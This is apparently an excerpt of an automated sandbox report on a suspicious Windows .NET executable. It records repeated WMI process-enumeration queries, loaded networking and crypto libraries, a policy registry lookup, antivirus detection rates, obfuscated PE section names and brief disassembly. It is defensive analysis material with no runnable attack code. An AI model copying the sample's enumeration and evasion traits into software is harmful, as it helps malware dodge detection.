            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5476
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5900
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6328
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5896
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3308
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2876
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2444
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2868
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6744
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4248
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 704
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2424
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1992
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5436
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2416
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6292
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2412
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5428
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4132
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1976
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6988
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3696
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4548
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 912
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1096
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4972
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4540
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1952
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1520
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4492
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1080
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5820
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6680
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2796
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5380
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6672
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5668
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1064
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 632
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5200
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6232
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6060
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3644
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 624
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5364
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6652
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1044
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4056
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6640
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6208
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5440
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2316
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3604
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2736
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4028
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3596
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5748
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1868
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1436
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1004
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6172
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4508
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4876
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4444
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7088
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1852
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 556
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6976
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2708
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5292
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1412
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3496
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 976
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5544
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3556
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1400
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 968
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4844
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1388
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2248
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 92
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4360
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3536
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6552
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1376
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2668
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3960
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1804
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2664
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3524
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2656
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5672
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4208
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 496
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1428
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2216
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6956
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 920
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 488
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1780
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6520
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1344
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2636
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6944
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2632
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1752
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1760
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6068
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 932
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6496
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3476
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2612
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6056
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1872
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5620
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4756
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1736
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2596
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3456
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 864
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 432
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 0
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: Ls4O6Pmixd.exeVirustotal: Detection: 41%
            Source: Ls4O6Pmixd.exeReversingLabs: Detection: 57%
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeSection loaded: napinsp.dllJump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeSection loaded: pnrpnsp.dllJump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeSection loaded: wshbth.dllJump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeSection loaded: nlaapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeSection loaded: winrnr.dllJump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeSection loaded: windowscodecs.dllJump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
            Source: Ls4O6Pmixd.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: Ls4O6Pmixd.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: initial sampleStatic PE information: section where entry point is pointing to: .hJL
            Source: Ls4O6Pmixd.exeStatic PE information: section name: .:"%
            Source: Ls4O6Pmixd.exeStatic PE information: section name: .W!:
            Source: Ls4O6Pmixd.exeStatic PE information: section name: .hJL
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeCode function: 4_2_00054A07 push rcx; ret 4_2_00054A1B
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeCode function: 4_2_00055D06 push rcx; ret 4_2_00055D07
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeCode function: 4_2_00054B14 push rcx; ret 4_2_00054B17
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeCode function: 4_2_00054A1F push rcx; ret 4_2_00054A20
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeCode function: 4_2_00054A35 push rcx; ret 4_2_00054A3F
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeCode function: 4_2_00054A43 push rcx; ret 4_2_00054A44
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeCode function: 4_2_00056C64 push 00000051h; ret 4_2_00056C74
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeCode function: 4_2_00054669 push rsi; iretd 4_2_0005467A
